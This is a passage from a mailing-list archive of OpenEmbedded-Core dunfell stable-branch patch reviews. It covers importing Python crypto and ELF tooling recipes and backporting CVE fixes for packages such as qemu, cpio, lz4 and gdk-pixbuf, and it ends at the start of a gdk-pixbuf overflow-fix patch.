[OE-core][dunfell 0/5] Patch review

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Pending final approval for an exception to LTS policy in this case please
review this patch series and have comments back by end of day Thursday.

For details on the motivation for this change see:

https://lists.openembedded.org/g/openembedded-architecture/message/1085

The following changes since commit ef5af31f406076107402694f5d6afb27b240eba6:

  linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)

are available in the Git repository at:

  git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Joshua Watt (5):
  pycryptodome: Import from meta-python
  pyelftools: Import from meta-python
  python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
  python3-pyelftools: Upgrade 0.25 -> 0.26
  layer.conf: Bump OE-Core layer version

 meta/conf/distro/include/maintainers.inc      |  5 +++-
 meta/conf/layer.conf                          |  2 +-
 .../python/python-pycryptodome.inc            | 26 +++++++++++++++++++
 .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
 .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
 .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
 6 files changed, 59 insertions(+), 2 deletions(-)
 create mode 100644 meta/recipes-devtools/python/python-pycryptodome.inc
 create mode 100644 meta/recipes-devtools/python/python3-pycryptodome_3.9.7.bb
 create mode 100644 meta/recipes-devtools/python/python3-pycryptodomex_3.9.7.bb
 create mode 100644 meta/recipes-devtools/python/python3-pyelftools_0.26.bb

-- 
2.17.1

Re: [OE-core][dunfell 0/5] Patch review

[akuster]

[-- Attachment #1: Type: text/plain, Size: 1818 bytes --]

Does someone have the complementary set of patches for meta-openbedded
to remove these?

- armin

On 6/3/20 8:33 AM, Steve Sakoman wrote:
> Pending final approval for an exception to LTS policy in this case please
> review this patch series and have comments back by end of day Thursday.
>
> For details on the motivation for this change see:
>
> https://lists.openembedded.org/g/openembedded-architecture/message/1085
>
> The following changes since commit ef5af31f406076107402694f5d6afb27b240eba6:
>
>   linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)
>
> are available in the Git repository at:
>
>   git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
>   http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut
>
> Joshua Watt (5):
>   pycryptodome: Import from meta-python
>   pyelftools: Import from meta-python
>   python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
>   python3-pyelftools: Upgrade 0.25 -> 0.26
>   layer.conf: Bump OE-Core layer version
>
>  meta/conf/distro/include/maintainers.inc      |  5 +++-
>  meta/conf/layer.conf                          |  2 +-
>  .../python/python-pycryptodome.inc            | 26 +++++++++++++++++++
>  .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
>  .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
>  .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
>  6 files changed, 59 insertions(+), 2 deletions(-)
>  create mode 100644 meta/recipes-devtools/python/python-pycryptodome.inc
>  create mode 100644 meta/recipes-devtools/python/python3-pycryptodome_3.9.7.bb
>  create mode 100644 meta/recipes-devtools/python/python3-pycryptodomex_3.9.7.bb
>  create mode 100644 meta/recipes-devtools/python/python3-pyelftools_0.26.bb
>
>
> 


[-- Attachment #2: Type: text/html, Size: 2498 bytes --]

Re: [OE-core][dunfell 0/5] Patch review

[Denys Dmytriyenko]

On Wed, Jun 03, 2020 at 10:33:55AM -0700, akuster wrote:
> Does someone have the complementary set of patches for meta-openbedded
> to remove these?

https://git.openembedded.org/meta-openembedded/commit/?id=a8f3c00d8d113b46a49584682e10435157d516ca
https://git.openembedded.org/meta-openembedded/commit/?id=7aee545a61c4f91d5e462d5b46b1b8f9a8bad1e3

Do you want me to re-submit them with [dunfell] tag?


> - armin
> 
> On 6/3/20 8:33 AM, Steve Sakoman wrote:
> > Pending final approval for an exception to LTS policy in this case please
> > review this patch series and have comments back by end of day Thursday.
> >
> > For details on the motivation for this change see:
> >
> > https://lists.openembedded.org/g/openembedded-architecture/message/1085
> >
> > The following changes since commit ef5af31f406076107402694f5d6afb27b240eba6:
> >
> >   linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)
> >
> > are available in the Git repository at:
> >
> >   git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
> >   http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut
> >
> > Joshua Watt (5):
> >   pycryptodome: Import from meta-python
> >   pyelftools: Import from meta-python
> >   python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
> >   python3-pyelftools: Upgrade 0.25 -> 0.26
> >   layer.conf: Bump OE-Core layer version
> >
> >  meta/conf/distro/include/maintainers.inc      |  5 +++-
> >  meta/conf/layer.conf                          |  2 +-
> >  .../python/python-pycryptodome.inc            | 26 +++++++++++++++++++
> >  .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
> >  .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
> >  .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
> >  6 files changed, 59 insertions(+), 2 deletions(-)
> >  create mode 100644 meta/recipes-devtools/python/python-pycryptodome.inc
> >  create mode 100644 meta/recipes-devtools/python/python3-pycryptodome_3.9.7.bb
> >  create mode 100644 meta/recipes-devtools/python/python3-pycryptodomex_3.9.7.bb
> >  create mode 100644 meta/recipes-devtools/python/python3-pyelftools_0.26.bb
> >
> >
> > 
> 

> 

Re: [OE-core][dunfell 0/5] Patch review

[akuster]

On 6/3/20 10:36 AM, Denys Dmytriyenko wrote:
> On Wed, Jun 03, 2020 at 10:33:55AM -0700, akuster wrote:
>> Does someone have the complementary set of patches for meta-openbedded
>> to remove these?
> https://git.openembedded.org/meta-openembedded/commit/?id=a8f3c00d8d113b46a49584682e10435157d516ca
> https://git.openembedded.org/meta-openembedded/commit/?id=7aee545a61c4f91d5e462d5b46b1b8f9a8bad1e3
>
> Do you want me to re-submit them with [dunfell] tag?
nah, the commits work of me. Thanks

- armin
>
>
>> - armin
>>
>> On 6/3/20 8:33 AM, Steve Sakoman wrote:
>>> Pending final approval for an exception to LTS policy in this case please
>>> review this patch series and have comments back by end of day Thursday.
>>>
>>> For details on the motivation for this change see:
>>>
>>> https://lists.openembedded.org/g/openembedded-architecture/message/1085
>>>
>>> The following changes since commit ef5af31f406076107402694f5d6afb27b240eba6:
>>>
>>>   linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)
>>>
>>> are available in the Git repository at:
>>>
>>>   git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
>>>   http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut
>>>
>>> Joshua Watt (5):
>>>   pycryptodome: Import from meta-python
>>>   pyelftools: Import from meta-python
>>>   python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
>>>   python3-pyelftools: Upgrade 0.25 -> 0.26
>>>   layer.conf: Bump OE-Core layer version
>>>
>>>  meta/conf/distro/include/maintainers.inc      |  5 +++-
>>>  meta/conf/layer.conf                          |  2 +-
>>>  .../python/python-pycryptodome.inc            | 26 +++++++++++++++++++
>>>  .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
>>>  .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
>>>  .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
>>>  6 files changed, 59 insertions(+), 2 deletions(-)
>>>  create mode 100644 meta/recipes-devtools/python/python-pycryptodome.inc
>>>  create mode 100644 meta/recipes-devtools/python/python3-pycryptodome_3.9.7.bb
>>>  create mode 100644 meta/recipes-devtools/python/python3-pycryptodomex_3.9.7.bb
>>>  create mode 100644 meta/recipes-devtools/python/python3-pyelftools_0.26.bb
>>>
>>>
>>>
>> 

Re: [OE-core][dunfell 0/5] Patch review

[akuster]

On 6/3/20 10:36 AM, Denys Dmytriyenko wrote:
> On Wed, Jun 03, 2020 at 10:33:55AM -0700, akuster wrote:
>> Does someone have the complementary set of patches for meta-openbedded
>> to remove these?
> https://git.openembedded.org/meta-openembedded/commit/?id=a8f3c00d8d113b46a49584682e10435157d516ca
> https://git.openembedded.org/meta-openembedded/commit/?id=7aee545a61c4f91d5e462d5b46b1b8f9a8bad1e3
>
> Do you want me to re-submit them with [dunfell] tag?

changes in stable/dunfell-nut for testing with my other backports.

-armin
>
>
>> - armin
>>
>> On 6/3/20 8:33 AM, Steve Sakoman wrote:
>>> Pending final approval for an exception to LTS policy in this case please
>>> review this patch series and have comments back by end of day Thursday.
>>>
>>> For details on the motivation for this change see:
>>>
>>> https://lists.openembedded.org/g/openembedded-architecture/message/1085
>>>
>>> The following changes since commit ef5af31f406076107402694f5d6afb27b240eba6:
>>>
>>>   linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)
>>>
>>> are available in the Git repository at:
>>>
>>>   git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
>>>   http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut
>>>
>>> Joshua Watt (5):
>>>   pycryptodome: Import from meta-python
>>>   pyelftools: Import from meta-python
>>>   python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
>>>   python3-pyelftools: Upgrade 0.25 -> 0.26
>>>   layer.conf: Bump OE-Core layer version
>>>
>>>  meta/conf/distro/include/maintainers.inc      |  5 +++-
>>>  meta/conf/layer.conf                          |  2 +-
>>>  .../python/python-pycryptodome.inc            | 26 +++++++++++++++++++
>>>  .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
>>>  .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
>>>  .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
>>>  6 files changed, 59 insertions(+), 2 deletions(-)
>>>  create mode 100644 meta/recipes-devtools/python/python-pycryptodome.inc
>>>  create mode 100644 meta/recipes-devtools/python/python3-pycryptodome_3.9.7.bb
>>>  create mode 100644 meta/recipes-devtools/python/python3-pycryptodomex_3.9.7.bb
>>>  create mode 100644 meta/recipes-devtools/python/python3-pyelftools_0.26.bb
>>>
>>>
>>>
>> 

Re: [OE-core][dunfell 0/5] Patch review

[Denys Dmytriyenko]

On Wed, Jun 03, 2020 at 11:17:20AM -0700, akuster808 wrote:
> 
> 
> On 6/3/20 10:36 AM, Denys Dmytriyenko wrote:
> > On Wed, Jun 03, 2020 at 10:33:55AM -0700, akuster wrote:
> >> Does someone have the complementary set of patches for meta-openbedded
> >> to remove these?
> > https://git.openembedded.org/meta-openembedded/commit/?id=a8f3c00d8d113b46a49584682e10435157d516ca
> > https://git.openembedded.org/meta-openembedded/commit/?id=7aee545a61c4f91d5e462d5b46b1b8f9a8bad1e3
> >
> > Do you want me to re-submit them with [dunfell] tag?
> 
> changes in stable/dunfell-nut for testing with my other backports.

Thanks!

> -armin
> >
> >
> >> - armin
> >>
> >> On 6/3/20 8:33 AM, Steve Sakoman wrote:
> >>> Pending final approval for an exception to LTS policy in this case please
> >>> review this patch series and have comments back by end of day Thursday.
> >>>
> >>> For details on the motivation for this change see:
> >>>
> >>> https://lists.openembedded.org/g/openembedded-architecture/message/1085
> >>>
> >>> The following changes since commit ef5af31f406076107402694f5d6afb27b240eba6:
> >>>
> >>>   linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)
> >>>
> >>> are available in the Git repository at:
> >>>
> >>>   git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
> >>>   http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut
> >>>
> >>> Joshua Watt (5):
> >>>   pycryptodome: Import from meta-python
> >>>   pyelftools: Import from meta-python
> >>>   python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
> >>>   python3-pyelftools: Upgrade 0.25 -> 0.26
> >>>   layer.conf: Bump OE-Core layer version
> >>>
> >>>  meta/conf/distro/include/maintainers.inc      |  5 +++-
> >>>  meta/conf/layer.conf                          |  2 +-
> >>>  .../python/python-pycryptodome.inc            | 26 +++++++++++++++++++
> >>>  .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
> >>>  .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
> >>>  .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
> >>>  6 files changed, 59 insertions(+), 2 deletions(-)
> >>>  create mode 100644 meta/recipes-devtools/python/python-pycryptodome.inc
> >>>  create mode 100644 meta/recipes-devtools/python/python3-pycryptodome_3.9.7.bb
> >>>  create mode 100644 meta/recipes-devtools/python/python3-pycryptodomex_3.9.7.bb
> >>>  create mode 100644 meta/recipes-devtools/python/python3-pyelftools_0.26.bb
> >>>
> >>>
> >>>
> >> 
> 

Re: [OE-core][dunfell 0/5] Patch review

[Martin Jansa]

[-- Attachment #1: Type: text/plain, Size: 2755 bytes --]

I think we still need corresponding LAYERDEPENDS_meta-python update which
isn't in master yet (and I haven't noticed it on the list).

Joshua: did I overlook it somewhere or should I send it?

On Wed, Jun 3, 2020 at 7:45 PM akuster <akuster808@gmail.com> wrote:

>
>
> On 6/3/20 10:36 AM, Denys Dmytriyenko wrote:
> > On Wed, Jun 03, 2020 at 10:33:55AM -0700, akuster wrote:
> >> Does someone have the complementary set of patches for meta-openbedded
> >> to remove these?
> >
> https://git.openembedded.org/meta-openembedded/commit/?id=a8f3c00d8d113b46a49584682e10435157d516ca
> >
> https://git.openembedded.org/meta-openembedded/commit/?id=7aee545a61c4f91d5e462d5b46b1b8f9a8bad1e3
> >
> > Do you want me to re-submit them with [dunfell] tag?
> nah, the commits work of me. Thanks
>
> - armin
> >
> >
> >> - armin
> >>
> >> On 6/3/20 8:33 AM, Steve Sakoman wrote:
> >>> Pending final approval for an exception to LTS policy in this case
> please
> >>> review this patch series and have comments back by end of day Thursday.
> >>>
> >>> For details on the motivation for this change see:
> >>>
> >>>
> https://lists.openembedded.org/g/openembedded-architecture/message/1085
> >>>
> >>> The following changes since commit
> ef5af31f406076107402694f5d6afb27b240eba6:
> >>>
> >>>   linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)
> >>>
> >>> are available in the Git repository at:
> >>>
> >>>   git://git.openembedded.org/openembedded-core-contrib
> stable/dunfell-nut
> >>>
> http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut
> >>>
> >>> Joshua Watt (5):
> >>>   pycryptodome: Import from meta-python
> >>>   pyelftools: Import from meta-python
> >>>   python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
> >>>   python3-pyelftools: Upgrade 0.25 -> 0.26
> >>>   layer.conf: Bump OE-Core layer version
> >>>
> >>>  meta/conf/distro/include/maintainers.inc      |  5 +++-
> >>>  meta/conf/layer.conf                          |  2 +-
> >>>  .../python/python-pycryptodome.inc            | 26 +++++++++++++++++++
> >>>  .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
> >>>  .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
> >>>  .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
> >>>  6 files changed, 59 insertions(+), 2 deletions(-)
> >>>  create mode 100644
> meta/recipes-devtools/python/python-pycryptodome.inc
> >>>  create mode 100644 meta/recipes-devtools/python/
> python3-pycryptodome_3.9.7.bb
> >>>  create mode 100644 meta/recipes-devtools/python/
> python3-pycryptodomex_3.9.7.bb
> >>>  create mode 100644 meta/recipes-devtools/python/
> python3-pyelftools_0.26.bb
> >>>
> >>>
> >>>
> >>
>
> 
>

[-- Attachment #2: Type: text/html, Size: 4744 bytes --]

Re: [OE-core][dunfell 0/5] Patch review

[Joshua Watt]

[-- Attachment #1: Type: text/plain, Size: 3078 bytes --]

On Wed, Jun 3, 2020, 6:33 PM Martin Jansa <martin.jansa@gmail.com> wrote:

> I think we still need corresponding LAYERDEPENDS_meta-python update which
> isn't in master yet (and I haven't noticed it on the list).
>
> Joshua: did I overlook it somewhere or should I send it?
>

I didn't send it because the layer version bump wasn't added to oe-core
until yesterday. If you can send the patch that would be great.

Thanks


> On Wed, Jun 3, 2020 at 7:45 PM akuster <akuster808@gmail.com> wrote:
>
>>
>>
>> On 6/3/20 10:36 AM, Denys Dmytriyenko wrote:
>> > On Wed, Jun 03, 2020 at 10:33:55AM -0700, akuster wrote:
>> >> Does someone have the complementary set of patches for meta-openbedded
>> >> to remove these?
>> >
>> https://git.openembedded.org/meta-openembedded/commit/?id=a8f3c00d8d113b46a49584682e10435157d516ca
>> >
>> https://git.openembedded.org/meta-openembedded/commit/?id=7aee545a61c4f91d5e462d5b46b1b8f9a8bad1e3
>> >
>> > Do you want me to re-submit them with [dunfell] tag?
>> nah, the commits work of me. Thanks
>>
>> - armin
>> >
>> >
>> >> - armin
>> >>
>> >> On 6/3/20 8:33 AM, Steve Sakoman wrote:
>> >>> Pending final approval for an exception to LTS policy in this case
>> please
>> >>> review this patch series and have comments back by end of day
>> Thursday.
>> >>>
>> >>> For details on the motivation for this change see:
>> >>>
>> >>>
>> https://lists.openembedded.org/g/openembedded-architecture/message/1085
>> >>>
>> >>> The following changes since commit
>> ef5af31f406076107402694f5d6afb27b240eba6:
>> >>>
>> >>>   linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)
>> >>>
>> >>> are available in the Git repository at:
>> >>>
>> >>>   git://git.openembedded.org/openembedded-core-contrib
>> stable/dunfell-nut
>> >>>
>> http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut
>> >>>
>> >>> Joshua Watt (5):
>> >>>   pycryptodome: Import from meta-python
>> >>>   pyelftools: Import from meta-python
>> >>>   python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
>> >>>   python3-pyelftools: Upgrade 0.25 -> 0.26
>> >>>   layer.conf: Bump OE-Core layer version
>> >>>
>> >>>  meta/conf/distro/include/maintainers.inc      |  5 +++-
>> >>>  meta/conf/layer.conf                          |  2 +-
>> >>>  .../python/python-pycryptodome.inc            | 26
>> +++++++++++++++++++
>> >>>  .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
>> >>>  .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
>> >>>  .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
>> >>>  6 files changed, 59 insertions(+), 2 deletions(-)
>> >>>  create mode 100644
>> meta/recipes-devtools/python/python-pycryptodome.inc
>> >>>  create mode 100644 meta/recipes-devtools/python/
>> python3-pycryptodome_3.9.7.bb
>> >>>  create mode 100644 meta/recipes-devtools/python/
>> python3-pycryptodomex_3.9.7.bb
>> >>>  create mode 100644 meta/recipes-devtools/python/
>> python3-pyelftools_0.26.bb
>> >>>
>> >>>
>> >>>
>> >>
>>
>> 
>>
>

[-- Attachment #2: Type: text/html, Size: 5695 bytes --]

Re: [OE-core][dunfell 0/5] Patch review

[Martin Jansa]

[-- Attachment #1: Type: text/plain, Size: 3598 bytes --]

I've sent the patch for meta-python now, but I see that I've sent it only
for version 11 (not 12 from "layer.conf: Bump OE-Core layer version" which
is being backported here and was merged to master just few hours ago in
https://git.openembedded.org/openembedded-core/commit/?id=2d503b27e7c88cee9a37c79c4605c77b11f230b6).
Sending v2 now.

On Thu, Jun 4, 2020 at 2:11 AM Joshua Watt <jpewhacker@gmail.com> wrote:

>
>
> On Wed, Jun 3, 2020, 6:33 PM Martin Jansa <martin.jansa@gmail.com> wrote:
>
>> I think we still need corresponding LAYERDEPENDS_meta-python update which
>> isn't in master yet (and I haven't noticed it on the list).
>>
>> Joshua: did I overlook it somewhere or should I send it?
>>
>
> I didn't send it because the layer version bump wasn't added to oe-core
> until yesterday. If you can send the patch that would be great.
>
> Thanks
>
>
>> On Wed, Jun 3, 2020 at 7:45 PM akuster <akuster808@gmail.com> wrote:
>>
>>>
>>>
>>> On 6/3/20 10:36 AM, Denys Dmytriyenko wrote:
>>> > On Wed, Jun 03, 2020 at 10:33:55AM -0700, akuster wrote:
>>> >> Does someone have the complementary set of patches for meta-openbedded
>>> >> to remove these?
>>> >
>>> https://git.openembedded.org/meta-openembedded/commit/?id=a8f3c00d8d113b46a49584682e10435157d516ca
>>> >
>>> https://git.openembedded.org/meta-openembedded/commit/?id=7aee545a61c4f91d5e462d5b46b1b8f9a8bad1e3
>>> >
>>> > Do you want me to re-submit them with [dunfell] tag?
>>> nah, the commits work of me. Thanks
>>>
>>> - armin
>>> >
>>> >
>>> >> - armin
>>> >>
>>> >> On 6/3/20 8:33 AM, Steve Sakoman wrote:
>>> >>> Pending final approval for an exception to LTS policy in this case
>>> please
>>> >>> review this patch series and have comments back by end of day
>>> Thursday.
>>> >>>
>>> >>> For details on the motivation for this change see:
>>> >>>
>>> >>>
>>> https://lists.openembedded.org/g/openembedded-architecture/message/1085
>>> >>>
>>> >>> The following changes since commit
>>> ef5af31f406076107402694f5d6afb27b240eba6:
>>> >>>
>>> >>>   linux-yocto/5.4: update to v5.4.43 (2020-06-01 07:19:09 -1000)
>>> >>>
>>> >>> are available in the Git repository at:
>>> >>>
>>> >>>   git://git.openembedded.org/openembedded-core-contrib
>>> stable/dunfell-nut
>>> >>>
>>> http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut
>>> >>>
>>> >>> Joshua Watt (5):
>>> >>>   pycryptodome: Import from meta-python
>>> >>>   pyelftools: Import from meta-python
>>> >>>   python3-pycryptodome(x): Upgrade 3.9.4 -> 3.9.7
>>> >>>   python3-pyelftools: Upgrade 0.25 -> 0.26
>>> >>>   layer.conf: Bump OE-Core layer version
>>> >>>
>>> >>>  meta/conf/distro/include/maintainers.inc      |  5 +++-
>>> >>>  meta/conf/layer.conf                          |  2 +-
>>> >>>  .../python/python-pycryptodome.inc            | 26
>>> +++++++++++++++++++
>>> >>>  .../python/python3-pycryptodome_3.9.7.bb      |  5 ++++
>>> >>>  .../python/python3-pycryptodomex_3.9.7.bb     |  9 +++++++
>>> >>>  .../python/python3-pyelftools_0.26.bb         | 14 ++++++++++
>>> >>>  6 files changed, 59 insertions(+), 2 deletions(-)
>>> >>>  create mode 100644
>>> meta/recipes-devtools/python/python-pycryptodome.inc
>>> >>>  create mode 100644 meta/recipes-devtools/python/
>>> python3-pycryptodome_3.9.7.bb
>>> >>>  create mode 100644 meta/recipes-devtools/python/
>>> python3-pycryptodomex_3.9.7.bb
>>> >>>  create mode 100644 meta/recipes-devtools/python/
>>> python3-pyelftools_0.26.bb
>>> >>>
>>> >>>
>>> >>>
>>> >>
>>>
>>> 
>>>
>>

[-- Attachment #2: Type: text/html, Size: 6585 bytes --]

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this next set of patches for dunfell and have comments back by
end of day Monday.

Passed a-full on autobuilder:

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/1611

The following changes since commit 84e1a32096db9deb98d282a652beec95dbfe80f1:

  python3: add ldconfig rdepends for python3-ctypes (2020-11-17 07:34:27 -1000)

are available in the Git repository at:

  git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Lee Chee Yang (5):
  libproxy: fix CVE-2020-26154
  bison: update to 3.5.4 for CVE-2020-14150
  python3: whitelist CVE-2020-15523
  python3: fix CVE-2020-27619
  qemu: fix CVE-2020-24352

 .../bison/{bison_3.5.3.bb => bison_3.5.4.bb}  |  2 +-
 .../python/python3/CVE-2020-27619.patch       | 70 +++++++++++++
 meta/recipes-devtools/python/python3_3.8.2.bb |  4 +
 meta/recipes-devtools/qemu/qemu.inc           |  1 +
 .../qemu/qemu/CVE-2020-24352.patch            | 52 ++++++++++
 .../libproxy/libproxy/CVE-2020-26154.patch    | 98 +++++++++++++++++++
 .../libproxy/libproxy_0.4.15.bb               |  1 +
 7 files changed, 227 insertions(+), 1 deletion(-)
 rename meta/recipes-devtools/bison/{bison_3.5.3.bb => bison_3.5.4.bb} (94%)
 create mode 100644 meta/recipes-devtools/python/python3/CVE-2020-27619.patch
 create mode 100644 meta/recipes-devtools/qemu/qemu/CVE-2020-24352.patch
 create mode 100644 meta/recipes-support/libproxy/libproxy/CVE-2020-26154.patch

-- 
2.17.1

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this next set of patches for dunfell and have comments back by
end of day Monday.

Passed a-full on autobuilder:

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/2540

The following changes since commit 448e0271ed831582bb5833486fc17b131676fb53:

  selftest: disable virgl headless test (2021-08-27 04:58:08 -1000)

are available in the Git repository at:

  git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Andrej Valek (1):
  vim: add option to disable NLS support

Armin Kuster (1):
  lz4: Security Fix for CVE-2021-3520

Matt Madison (1):
  layer.conf: fix syntax error in PATH setting

Richard Purdie (1):
  sdk: Decouple default install path from built in path

Ross Burton (1):
  cpio: backport fix for CVE-2021-38185

 meta/classes/populate_sdk_base.bbclass        |   1 +
 meta/conf/bitbake.conf                        |   4 +-
 meta/conf/layer.conf                          |   2 +-
 meta/files/toolchain-shar-extract.sh          |   3 +-
 meta/files/toolchain-shar-relocate.sh         |   2 +-
 .../cpio/cpio-2.13/CVE-2021-38185.patch       | 581 ++++++++++++++++++
 meta/recipes-extended/cpio/cpio_2.13.bb       |   1 +
 .../lz4/files/CVE-2021-3520.patch             |  27 +
 meta/recipes-support/lz4/lz4_1.9.2.bb         |   1 +
 meta/recipes-support/vim/vim.inc              |   4 +-
 10 files changed, 621 insertions(+), 5 deletions(-)
 create mode 100644 meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
 create mode 100644 meta/recipes-support/lz4/files/CVE-2021-3520.patch

-- 
2.25.1

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this next set of changes for dunfell and have comments back by
end of day Thursday.

Passed a-full on autobuilder:

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/2554

The following changes since commit b46b059a306b2823624e64adecded9f76430471a:

  layer.conf: fix syntax error in PATH setting (2021-09-03 04:05:12 -1000)

are available in the Git repository at:

  git://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Changqing Li (1):
  gdk-pixbuf: fix CVE-2021-20240

Martin Jansa (1):
  default-distrovars.inc: Set BBINCLUDELOGS to empty to disable printing
    failed task output multiple times

Purushottam Choudhary (1):
  lighttpd: Add patch for reuse large memory chunks

Richard Purdie (2):
  xdg-utils: Add fix for CVE-2020-27748
  oeqa/runtime/parselogs: Make DVD ata error apply to all qemux86
    machines

 .../distro/include/default-distrovars.inc     |   6 +-
 meta/conf/documentation.conf                  |   2 +-
 meta/lib/oeqa/runtime/cases/parselogs.py      |   2 +-
 ...or-pcre-dependency-instead-of-config.patch |  10 +-
 ...-mem-chunks-fix-mem-usage-fixes-3033.patch | 224 ++++++++++++++++++
 .../lighttpd/default-chunk-size-8k.patch      |  35 +++
 .../lighttpd/lighttpd_1.4.55.bb               |   2 +
 ...9813e0eb0246f63b54e9e154970e609575af.patch |  58 +++++
 .../xdg-utils/xdg-utils_1.1.3.bb              |   1 +
 .../gdk-pixbuf/CVE-2021-20240.patch           |  40 ++++
 .../gdk-pixbuf/gdk-pixbuf_2.40.0.bb           |   1 +
 11 files changed, 371 insertions(+), 10 deletions(-)
 create mode 100644 meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
 create mode 100644 meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
 create mode 100644 meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
 create mode 100644 meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch

-- 
2.25.1

[OE-core][dunfell 1/5] gdk-pixbuf: fix CVE-2021-20240

[Steve Sakoman]

From: Changqing Li <changqing.li@windriver.com>

Source: https://git.openembedded.org/openembedded-core
MR: 111543
Type: Security Fix
Disposition: Backport from https://git.openembedded.org/openembedded-core/commit/meta/recipes-gnome/gdk-pixbuf?h=hardknott&id=bd08e4d179979937604c196b4047f59c5499a960
ChangeID: bd08e4d179979937604c196b4047f59c5499a960
Description:

(From OE-Core rev: bd08e4d179979937604c196b4047f59c5499a960)

Signed-off-by: Changqing Li <changqing.li@windriver.com>
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit de631334ccd2d6af74ed795228394ee2b7218403)
Signed-off-by: Armin Kuster <akuster@mvista.com>
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 .../gdk-pixbuf/CVE-2021-20240.patch           | 40 +++++++++++++++++++
 .../gdk-pixbuf/gdk-pixbuf_2.40.0.bb           |  1 +
 2 files changed, 41 insertions(+)
 create mode 100644 meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch

diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
new file mode 100644
index 0000000000..fe594b24bb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
@@ -0,0 +1,40 @@
+From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001
+From: Emmanuele Bassi <ebassi@gnome.org>
+Date: Wed, 1 Apr 2020 18:11:55 +0100
+Subject: [PATCH] Check the memset length argument
+
+Avoid overflows by using the checked multiplication macro for gsize.
+
+Fixes: #132
+
